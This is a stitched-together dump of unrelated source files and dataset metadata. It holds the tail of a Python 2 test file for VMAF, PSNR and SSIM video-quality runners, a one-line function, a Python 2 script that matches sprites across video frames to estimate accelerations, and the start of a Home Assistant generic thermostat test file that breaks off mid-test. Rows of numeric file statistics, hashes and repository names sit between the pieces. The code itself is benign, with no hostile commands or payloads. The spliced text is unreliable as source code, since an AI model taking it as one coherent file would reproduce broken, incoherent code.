self.assertAlmostEqual(results[1]['VMAF_feature_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm2_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 76.699271272486044, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 99.946416604585025, places=4)
self.assertAlmostEqual(results[2]['VMAF_score'], 76.699271272486044, places=4)
self.assertAlmostEqual(results[3]['VMAF_score'], 99.946416604585025, places=4)
def test_run_parallel_psnr_runner(self):
print 'test on running PSNR quality runner in parallel...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = PsnrQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['PSNR_score'], 30.755063979166664, places=4)
self.assertAlmostEqual(results[1]['PSNR_score'], 60.0, places=4)
def test_run_parallel_vamf_runner_with_rf_model(self):
print 'test on running VMAF quality runner in parallel with RF model...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original, asset, asset, asset],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'model_filepath':VmafConfig.model_path("nflx_vmaff_rf_v2.pkl"),
},
optional_dict2=None,
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_score'], 0.4460930625, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_ansnr_score'], 23.5095715208, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'],4.04982535417, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 31.2714392708, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 79.224759615384599, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 100.0, places=4)
self.assertAlmostEqual(results[2]['VMAF_score'], 79.224759615384599, places=4)
self.assertAlmostEqual(results[3]['VMAF_score'], 79.224759615384599, places=4)
self.assertAlmostEqual(results[4]['VMAF_score'], 79.224759615384599, places=4)
def test_run_parallel_ssim_runner(self):
print 'test on running SSIM quality runner in parallel...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = SsimQualityRunner(
[asset, asset_original, asset, asset],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['SSIM_score'], 0.86322654166666657, places=4)
self.assertAlmostEqual(results[0]['SSIM_feature_ssim_l_score'], 0.9981474583333334, places=4)
self.assertAlmostEqual(results[0]['SSIM_feature_ssim_c_score'], 0.96126793750000006, places=4)
self.assertAlmostEqual(results[0]['SSIM_feature_ssim_s_score'], 0.89773633333333336, places=4)
self.assertAlmostEqual(results[1]['SSIM_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['SSIM_feature_ssim_l_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['SSIM_feature_ssim_c_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['SSIM_feature_ssim_s_score'], 1.0, places=4)
self.assertAlmostEqual(results[2]['SSIM_score'], 0.86322654166666657, places=4)
self.assertAlmostEqual(results[3]['SSIM_score'], 0.86322654166666657, places=4)
def test_run_parallel_msssim_runner(self):
print 'test on running MS-SSIM quality runner in parallel...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = MsSsimQualityRunner(
[asset, asset_original, asset],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['MS_SSIM_score'], 0.9632498125, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale0_score'], 0.9981474583333334, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale0_score'], 0.96126793750000006, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale0_score'], 0.89773633333333336, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale1_score'], 0.99899612500000001, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale1_score'], 0.9857694375, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale1_score'], 0.941185875, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale2_score'], 0.99923564583333324, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale2_score'], 0.997034020833, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale2_score'], 0.977992145833, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale3_score'], 0.99929210416666658, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale3_score'], 0.999588104167, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale3_score'], 0.99387125, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale4_score'], 0.99940356249999995, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale4_score'], 0.999907625, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale4_score'], 0.998222583333, places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale0_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale0_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale0_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale1_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale1_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale1_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale2_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale2_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale2_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale3_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale3_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale3_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale4_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale4_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale4_score'], 1., places=4)
self.assertAlmostEqual(results[2]['MS_SSIM_score'], 0.9632498125, places=4)
def test_run_parallel_msssim_runner_with_result_store(self):
print 'test on running MS-SSIM quality runner in parallel...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = MsSsimQualityRunner(
[asset, asset_original, asset, asset],
None, fifo_mode=True,
delete_workdir=True,
result_store=self.result_store
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['MS_SSIM_score'], 0.9632498125, places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_score'], 1.0, places=4)
self.assertAlmostEqual(results[2]['MS_SSIM_score'], 0.9632498125, places=4)
self.assertAlmostEqual(results[3]['MS_SSIM_score'], 0.9632498125, places=4)
def test_run_parallel_runner_with_repeated_assets(self):
print 'test on running PSNR quality runner in parallel with repeated assets...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = PsnrQualityRunner(
[asset, asset_original, asset, asset],
None, fifo_mode=True,
delete_workdir=True,
result_store=self.result_store
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['PSNR_score'], 30.755063979166664, places=4)
self.assertAlmostEqual(results[1]['PSNR_score'], 60.0, places=4)
self.assertAlmostEqual(results[2]['PSNR_score'], 30.755063979166664, places=4)
self.assertAlmostEqual(results[3]['PSNR_score'], 30.755063979166664, places=4)
def test_run_parallel_runner_with_parallel_disabled(self):
print 'test on running PSNR quality runner in parallel with parallelization disabled...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = PsnrQualityRunner(
[asset, asset_original, asset, asset],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run(parallelize=False)
results = self.runner.results
self.assertAlmostEqual(results[0]['PSNR_score'], 30.755063979166664, places=4)
self.assertAlmostEqual(results[1]['PSNR_score'], 60.0, places=4)
self.assertAlmostEqual(results[2]['PSNR_score'], 30.755063979166664, places=4)
self.assertAlmostEqual(results[3]['PSNR_score'], 30.755063979166664, places=4)
def test_run_parallel_vmafossexec_runner_with_repeated_assets(self):
print 'test on running VMAFOSSEXEC quality runner in parallel with repeated assets...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafossExecQualityRunner(
[asset, asset_original, asset, asset],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 76.699266666666674, places=3)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'], 99.946416666666664, places=4)
self.assertAlmostEqual(results[2]['VMAFOSSEXEC_score'], 76.699266666666674, places=3)
self.assertAlmostEqual(results[3]['VMAFOSSEXEC_score'], 76.699266666666674, places=3)
def test_run_parallel_niqe_runner(self):
print 'test on running NIQE runner in parallel...'
ref1_path = VmafConfig.test_resource_path("test_image_yuv", "100007.yuv")
ref2_path = VmafConfig.test_resource_path("test_image_yuv", "100039.yuv")
asset1 = NorefAsset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
dis_path=ref1_path,
asset_dict={'width':481, 'height':321, 'yuv_type':'yuv444p'})
asset2 = NorefAsset(dataset="test", content_id=0, asset_id=1,
workdir_root=VmafConfig.workdir_path(),
dis_path=ref2_path,
asset_dict={'width':481, 'height':321, 'yuv_type':'yuv444p'})
self.runner = NiqeQualityRunner(
[asset1, asset2],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={},
optional_dict2={},
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['NIQE_score'], 4.8656072348129422, places=4)
self.assertAlmostEqual(results[1]['NIQE_score'], 2.9309929860778756, places=2)
class QualityRunnerVersionTest(unittest.TestCase):
def test_vmaf_quality_runner_version(self):
self.assertEquals(VmafQualityRunner.VERSION, 'F0.2.4c-0.6.1')
self.assertEquals(VmafQualityRunner.ALGO_VERSION, 2)
def test_vmafossexec_quality_runner_version(self):
self.assertEquals(VmafossExecQualityRunner.VERSION, 'F0.2.4c-0.6.1')
self.assertEquals(VmafossExecQualityRunner.ALGO_VERSION, 2)
class VmafossexecQualityRunnerSubsamplingTest(unittest.TestCase):
def tearDown(self):
if hasattr(self, 'runner0'):
self.runner0.remove_results()
if hasattr(self, 'runner'):
self.runner.remove_results()
def setUp(self):
self.result_store = FileSystemResultStore()
def test_run_vmafossexec_runner_with_subsample2(self):
print 'test on running VMAFOSSEXEC runner with subsample2...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
subsample = 5
self.runner0 = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={}
)
self.runner0.run()
results0 = self.runner0.results
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={'subsample': subsample}
)
self.runner.run()
results = self.runner.results
for i in range(48):
if i % subsample == 0:
self.assertAlmostEqual(results0[0]['VMAFOSSEXEC_scores'][i], results[0]['VMAFOSSEXEC_scores'][i / subsample], places=7)
self.assertAlmostEqual(results0[1]['VMAFOSSEXEC_scores'][i], results[1]['VMAFOSSEXEC_scores'][i / subsample], places=7)
if __name__ == '__main__':
unittest.main()
| 53.378544
| 135
| 0.692277
| 11,501
| 96,028
| 5.490392
| 0.036171
| 0.187236
| 0.248761
| 0.199097
| 0.950146
| 0.947771
| 0.93621
| 0.930636
| 0.902051
| 0.870869
| 0
| 0.11191
| 0.19285
| 96,028
| 1,798
| 136
| 53.408231
| 0.70277
| 0.001062
| 0
| 0.737805
| 0
| 0
| 0.204758
| 0.144241
| 0
| 0
| 0
| 0
| 0.395664
| 0
| null | null | 0.001355
| 0.00542
| null | null | 0.039295
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
0afd86b35326bc651bd014c5d7c5f29a93f0fc48
| 39
|
py
|
Python
|
pex-compile/test1.py
|
kodo-pp/pyke
|
3d216911819087b123126831fb702d2bb0cc240f
|
[
"Apache-2.0"
] | 1
|
2020-11-27T23:09:46.000Z
|
2020-11-27T23:09:46.000Z
|
pex-compile/test1.py
|
kodo-pp/pyke
|
3d216911819087b123126831fb702d2bb0cc240f
|
[
"Apache-2.0"
] | null | null | null |
pex-compile/test1.py
|
kodo-pp/pyke
|
3d216911819087b123126831fb702d2bb0cc240f
|
[
"Apache-2.0"
] | null | null | null |
def foo(a, b, c):
print(a + b + c)
| 13
| 20
| 0.435897
| 9
| 39
| 1.888889
| 0.666667
| 0.235294
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 39
| 2
| 21
| 19.5
| 0.653846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 1
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
e400917d8ea2037d2085e6abe4a7bf55eb326de0
| 11,337
|
py
|
Python
|
findAccelerations.py
|
mguzdial3/VideoGameEngineLearning
|
4a849df7a5a53f97d604c47594fc34874bef2982
|
[
"MIT"
] | 5
|
2018-06-05T20:19:59.000Z
|
2020-06-04T06:53:03.000Z
|
findAccelerations.py
|
mguzdial3/VideoGameEngineLearning
|
4a849df7a5a53f97d604c47594fc34874bef2982
|
[
"MIT"
] | null | null | null |
findAccelerations.py
|
mguzdial3/VideoGameEngineLearning
|
4a849df7a5a53f97d604c47594fc34874bef2982
|
[
"MIT"
] | 3
|
2019-03-03T18:50:33.000Z
|
2020-01-17T00:36:46.000Z
|
import csv, shutil, sys, os, copy, glob
import random, math
import numpy as np
frameDirectory = "./frames5-25fpers/"
#The thing for storing a reference to a single object in a frame
class FrameObject:
def __init__(self, name, positionX, positionY, width, height, velocityX, velocityY, confidence):
self.name = name
self.width = width
self.height = height
self.confidence = confidence
self.centerX = positionX
self.centerY = positionY
self.velocity = (velocityX,velocityY)
#Return distance between two objects in terms of centroid distance and dimensions difference
def objectDistance(obj1, obj2):
return abs(obj1.centerX-obj2.centerX) + abs(obj1.centerY-obj2.centerY) + abs( (obj1.width)-(obj2.width) )+abs(obj1.height-obj2.height) + abs(obj1.velocity[0]-obj2.velocity[0]) + abs(obj1.velocity[1]-obj2.velocity[1])
#PLAYER SHIT
source = open(frameDirectory+"marioChanges.csv","rb")
reader = csv.reader(source)
target = open("./frames5-25fpers/playerAccelerationTrack.csv", "wr")
writer = csv.writer(target)
rowOne = ["frame", "prevSprite", "thisSprite", "x", "y", "width", "height", "velocityX", "velocityY", "preVelocityX", "preVelocityY", "changeConfidence"]
writer.writerow(rowOne)
readIt = False
#Stores velocity for last frame
preVelocityX = 0
preVelocityY = 0
for row in reader:
if readIt:
print str(row[0])
writer.writerow([row[0], str(row[1]), str(row[2]), str(row[3]), str(row[4]), str(row[5]), str(row[6]), str(row[7]), str(row[8]), str(preVelocityX), str(preVelocityY), str(row[9])])
preVelocityX = float(row[7])
preVelocityY = float(row[8])
readIt=True
target.close()
source.close()
#OTHER SPRITES
source = open("./frames5-25fpers/spriteChanges.csv","rb")
reader = csv.reader(source)
target = open("./frames5-25fpers/spriteAccelerationTrack.csv", "wr")
writer = csv.writer(target)
rowOne = ["frame", "prevSprite", "thisSprite", "x", "y", "width", "height", "velocityX", "velocityY", "preVelocityX", "preVelocityY", "changeConfidence"]
writer.writerow(rowOne)
readIt = False
#Stores velocity for last frame
prevFrameObjects = []
thisFrameObjects = []
prevFrame = 0
thisFrame = 0
for row in reader:
if readIt:
currentFrame = int(row[0])
if not currentFrame==thisFrame and len(thisFrameObjects)>0:
print "Frame Print "+str(thisFrame)
if len(prevFrameObjects)>0 and thisFrame==(prevFrame+1):
#Set up for matching
thisFrameObjects = sorted(thisFrameObjects, key = lambda item: (item.centerX, item.centerY, item.width, item.height))
fromObjects = []
toObjects = []
#Determine where we'll pulling from based on
if len(thisFrameObjects)>=len(prevFrameObjects):
fromObjects = thisFrameObjects
toObjects = prevFrameObjects
else:
fromObjects = prevFrameObjects
toObjects = thisFrameObjects
maxLength = max(len(thisFrameObjects), len(prevFrameObjects))
fromPairs = fromObjects
toPairs = [None]*maxLength
toDists = [float("inf")]*maxLength
pairIndex = 0
threshold = 70
#Do matching from from to to
for obj in fromObjects:
matchFound = False
cantUse = []
#search till we find an unused object from prevObjects in toObjects to pair with fromObjects
while not matchFound:
minObj = None
minDist = float("inf")
for toObj in toObjects:
thisDist = objectDistance(obj, toObj)
if thisDist<minDist and thisDist<threshold and not toObj in cantUse:
minObj=toObj
minDist = thisDist
if minObj == None:# We can't find any pair for this
toPairs[pairIndex] = None
pairIndex +=1 #Move to next pairIndex
matchFound = True
else: #We found a pair for this
if not minObj in toPairs: #If this isn't already in toPairs
toPairs[pairIndex] = minObj
toDists[pairIndex] = thisDist
pairIndex +=1 #Move to next pairIndex
matchFound = True
else: #If this is already in toPairs
toPairIndex = toPairs.index(minObj)
if toDists[toPairIndex]<=minDist: #If its already used and toDists has a better match
cantUse.append(minObj)
else: #If it's already used but toDists has a worse match
#Set this value
toPairs[pairIndex] = minObj
toDists[pairIndex] = thisDist
pairIndex +=1 #Move to next pairIndex
matchFound = True
#reset the old value
toPairs[toPairIndex] = None
toDists[toPairIndex] = float("inf")
#Find a new value (if we can)
if pairIndex<(len(toPairs)-1):
minObj = None
minDist = float("inf")
for index in range(pairIndex, len(toObjects)):
thisDist = objectDistance(fromObjects[toPairIndex], toObjects[index])
if thisDist<minDist and thisDist<threshold:
minObj=toObjects[index]
minDist = thisDist
toPairs[toPairIndex] = minObj
toDists[toPairIndex] = minDist
#Activate the pairs
currEndPair = None
prevEndPair = None
if len(thisFrameObjects)>=len(prevFrameObjects):
currEndPair = thisFrameObjects
prevEndPair = toPairs
else:
currEndPair = toPairs
prevEndPair = prevFrameObjects
#Write out all the pairs
for index in range(0, maxLength):
prevSprite = "None"
thisSprite = "None"
x = 0
y = 0
preX = 0
preY = 0
width = 0
height = 0
velocityX = 0
velocityY = 0
preVelocityX = 0
preVelocityY = 0
preConfidence = 1.0
thisConfidence = 1.0
changeConfidence = 0.0
if not currEndPair[index]==None:
currObj = currEndPair[index]
thisSprite = currObj.name
x = currObj.centerX
y = currObj.centerY
velocityX = currEndPair[index].velocity[0]
velocityY = currEndPair[index].velocity[1]
width = currObj.width
height = currObj.height
thisConfidence = currObj.confidence
if not prevEndPair[index]==None:
prevObj = prevEndPair[index]
prevSprite = prevObj.name
preX = prevObj.centerX
preY = prevObj.centerY
preVelocityX = prevEndPair[index].velocity[0]
preVelocityY = prevEndPair[index].velocity[1]
preConfidence = prevObj.confidence
if currEndPair[index] == None:
x = preX
y = preY
velocityX = preVelocityX
velocityY = preVelocityY
if prevEndPair[index] == None:
preX = x
preY = y
preVelocityX = velocityX
preVelocityY = velocityY
thisConfidence = obj.confidence
changeConfidence = thisConfidence
writer.writerow([str(thisFrame), prevSprite, thisSprite, str(x), str(y), str(width), str(height), str(velocityX), str(velocityY), str(preVelocityX), str(preVelocityY), str(changeConfidence)])
else:
#Print out all of them assuming no stuff
preVelocityX = 0
preVelocityY = 0
for fo in thisFrameObjects:
writer.writerow([str(thisFrame), str(row[1]), str(row[2]), str(row[3]), str(row[4]), str(row[5]), str(row[6]), str(row[7]), str(row[8]), str(preVelocityX), str(preVelocityY), str(row[9])])
prevFrameObjects = thisFrameObjects
prevFrame = thisFrame
thisFrameObjects = []
thisFrameObjects.append(FrameObject(str(row[2]), float(row[3]), float(row[4]), float(row[5]), float(row[6]), float(row[7]), float(row[8]), float(row[9])))
thisFrame = currentFrame
readIt=True
#Set up for matching
thisFrameObjects = sorted(thisFrameObjects, key = lambda item: (item.centerX, item.centerY, item.width, item.height))
fromObjects = []
toObjects = []
#Determine where we'll pulling from based on
if len(thisFrameObjects)>=len(prevFrameObjects):
fromObjects = thisFrameObjects
toObjects = prevFrameObjects
else:
fromObjects = prevFrameObjects
toObjects = thisFrameObjects
maxLength = max(len(thisFrameObjects), len(prevFrameObjects))
fromPairs = fromObjects
toPairs = [None]*maxLength
toDists = [float("inf")]*maxLength
pairIndex = 0
threshold = 70
#Do matching from from to to
for obj in fromObjects:
matchFound = False
cantUse = []
#search till we find an unused object from prevObjects in toObjects to pair with fromObjects
while not matchFound:
minObj = None
minDist = float("inf")
for toObj in toObjects:
thisDist = objectDistance(obj, toObj)
if thisDist<minDist and thisDist<threshold and not toObj in cantUse:
minObj=toObj
minDist = thisDist
if minObj == None:# We can't find any pair for this
toPairs[pairIndex] = None
pairIndex +=1 #Move to next pairIndex
matchFound = True
else: #We found a pair for this
if not minObj in toPairs: #If this isn't already in toPairs
toPairs[pairIndex] = minObj
toDists[pairIndex] = thisDist
pairIndex +=1 #Move to next pairIndex
matchFound = True
else: #If this is already in toPairs
toPairIndex = toPairs.index(minObj)
if toDists[toPairIndex]<=minDist: #If its already used and toDists has a better match
cantUse.append(minObj)
else: #If it's already used but toDists has a worse match
#Set this value
toPairs[pairIndex] = minObj
toDists[pairIndex] = thisDist
pairIndex +=1 #Move to next pairIndex
matchFound = True
#reset the old value
toPairs[toPairIndex] = None
toDists[toPairIndex] = float("inf")
#Find a new value (if we can)
if pairIndex<(len(toPairs)-1):
minObj = None
minDist = float("inf")
for index in range(pairIndex, len(toObjects)):
thisDist = objectDistance(fromObjects[toPairIndex], toObjects[index])
if thisDist<minDist and thisDist<threshold:
minObj=toObjects[index]
minDist = thisDist
toPairs[toPairIndex] = minObj
toDists[toPairIndex] = minDist
#Activate the pairs
currEndPair = None
prevEndPair = None
if len(thisFrameObjects)>=len(prevFrameObjects):
currEndPair = thisFrameObjects
prevEndPair = toPairs
else:
currEndPair = toPairs
prevEndPair = prevFrameObjects
#Write out all the pairs
for index in range(0, maxLength):
prevSprite = "None"
thisSprite = "None"
x = 0
y = 0
preX = 0
preY = 0
width = 0
height = 0
velocityX = 0
velocityY = 0
preVelocityX = 0
preVelocityY = 0
preConfidence = 1.0
thisConfidence = 1.0
changeConfidence = 0.0
if not currEndPair[index]==None:
currObj = currEndPair[index]
thisSprite = currObj.name
x = currObj.centerX
y = currObj.centerY
velocityX = currEndPair[index].velocity[0]
velocityY = currEndPair[index].velocity[1]
width = currObj.width
height = currObj.height
thisConfidence = currObj.confidence
if not prevEndPair[index]==None:
prevObj = prevEndPair[index]
prevSprite = prevObj.name
preX = prevObj.centerX
preY = prevObj.centerY
preVelocityX = prevEndPair[index].velocity[0]
preVelocityY = prevEndPair[index].velocity[1]
preConfidence = prevObj.confidence
if currEndPair[index] == None:
x = preX
y = preY
velocityX = preVelocityX
velocityY = preVelocityY
if prevEndPair[index] == None:
preX = x
preY = y
preVelocityX = velocityX
preVelocityY = velocityY
thisConfidence = obj.confidence
changeConfidence = thisConfidence
writer.writerow([str(thisFrame), prevSprite, thisSprite, str(x), str(y), str(width), str(height), str(velocityX), str(velocityY), str(preVelocityX), str(preVelocityY), str(changeConfidence)])
target.close()
source.close()
| 30.723577
| 217
| 0.684749
| 1,350
| 11,337
| 5.747407
| 0.148148
| 0.015466
| 0.017013
| 0.029385
| 0.824333
| 0.817373
| 0.817373
| 0.811445
| 0.811445
| 0.811445
| 0
| 0.014073
| 0.210285
| 11,337
| 369
| 218
| 30.723577
| 0.852563
| 0.124283
| 0
| 0.874564
| 0
| 0
| 0.041574
| 0.012644
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.010453
| null | null | 0.006969
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7c4ee8db58f664af4a9779fa60b93c2d5dc4e596
| 21,235
|
py
|
Python
|
tests/components/climate/test_generic_thermostat.py
|
rubund/debian-home-assistant
|
1a3e8f7e4b9ddec60a4380e141fb327d03ac69b5
|
[
"MIT"
] | 1
|
2020-07-17T14:52:56.000Z
|
2020-07-17T14:52:56.000Z
|
tests/components/climate/test_generic_thermostat.py
|
1Forward1Back/home-assistant
|
ce24ef0c20dea0fd671d6f2c2a8b1456b4b66ba6
|
[
"MIT"
] | null | null | null |
tests/components/climate/test_generic_thermostat.py
|
1Forward1Back/home-assistant
|
ce24ef0c20dea0fd671d6f2c2a8b1456b4b66ba6
|
[
"MIT"
] | 1
|
2020-07-17T14:53:53.000Z
|
2020-07-17T14:53:53.000Z
|
"""The tests for the generic_thermostat."""
import datetime
import unittest
from unittest import mock
from homeassistant.core import callback
from homeassistant.bootstrap import setup_component
from homeassistant.const import (
ATTR_UNIT_OF_MEASUREMENT,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_ON,
STATE_OFF,
TEMP_CELSIUS,
)
from homeassistant.util.unit_system import METRIC_SYSTEM
from homeassistant.components import climate
from tests.common import assert_setup_component, get_test_home_assistant
ENTITY = 'climate.test'
ENT_SENSOR = 'sensor.test'
ENT_SWITCH = 'switch.test'
MIN_TEMP = 3.0
MAX_TEMP = 65.0
TARGET_TEMP = 42.0
TOLERANCE = 0.5
class TestSetupClimateGenericThermostat(unittest.TestCase):
"""Test the Generic thermostat with custom config."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
def tearDown(self): # pylint: disable=invalid-name
"""Stop down everything that was started."""
self.hass.stop()
def test_setup_missing_conf(self):
"""Test set up heat_control with missing config values."""
config = {
'name': 'test',
'target_sensor': ENT_SENSOR
}
with assert_setup_component(0):
setup_component(self.hass, 'climate', {
'climate': config})
def test_valid_conf(self):
"""Test set up genreic_thermostat with valid config values."""
self.assertTrue(setup_component(self.hass, 'climate',
{'climate': {
'platform': 'generic_thermostat',
'name': 'test',
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR}}))
def test_setup_with_sensor(self):
"""Test set up heat_control with sensor to trigger update at init."""
self.hass.states.set(ENT_SENSOR, 22.0, {
ATTR_UNIT_OF_MEASUREMENT: TEMP_CELSIUS
})
assert setup_component(self.hass, climate.DOMAIN, {'climate': {
'platform': 'generic_thermostat',
'name': 'test',
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR
}})
state = self.hass.states.get(ENTITY)
self.assertEqual(
TEMP_CELSIUS, state.attributes.get('unit_of_measurement'))
self.assertEqual(22.0, state.attributes.get('current_temperature'))
class TestClimateGenericThermostat(unittest.TestCase):
"""Test the Generic thermostat."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.hass.config.units = METRIC_SYSTEM
assert setup_component(self.hass, climate.DOMAIN, {'climate': {
'platform': 'generic_thermostat',
'name': 'test',
'tolerance': 2,
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR
}})
def tearDown(self): # pylint: disable=invalid-name
"""Stop down everything that was started."""
self.hass.stop()
def test_setup_defaults_to_unknown(self):
"""Test the setting of defaults to unknown."""
self.assertEqual('idle', self.hass.states.get(ENTITY).state)
def test_default_setup_params(self):
"""Test the setup with default parameters."""
state = self.hass.states.get(ENTITY)
self.assertEqual(7, state.attributes.get('min_temp'))
self.assertEqual(35, state.attributes.get('max_temp'))
self.assertEqual(None, state.attributes.get('temperature'))
def test_custom_setup_params(self):
"""Test the setup with custom parameters."""
self.hass.config.components.remove(climate.DOMAIN)
assert setup_component(self.hass, climate.DOMAIN, {'climate': {
'platform': 'generic_thermostat',
'name': 'test',
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR,
'min_temp': MIN_TEMP,
'max_temp': MAX_TEMP,
'target_temp': TARGET_TEMP,
}})
